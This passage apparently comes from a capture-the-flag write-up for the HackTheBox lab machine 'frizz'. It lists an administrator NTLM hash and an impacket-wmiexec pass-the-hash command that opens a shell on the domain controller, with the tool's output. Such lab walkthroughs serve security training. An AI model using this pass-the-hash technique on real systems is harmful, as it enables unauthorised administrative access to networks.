Credentials:
  Hash NTLM: c457b5f1c315bef53b9cabc92e993d0b

Then log in directly as administrator (SSH login failed again).

~/D/t $impacket-wmiexec   frizz.htb/administrator@frizzdc.frizz.htb -hashes :c457b5f1c315bef53b9cabc92e993d0b -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
0
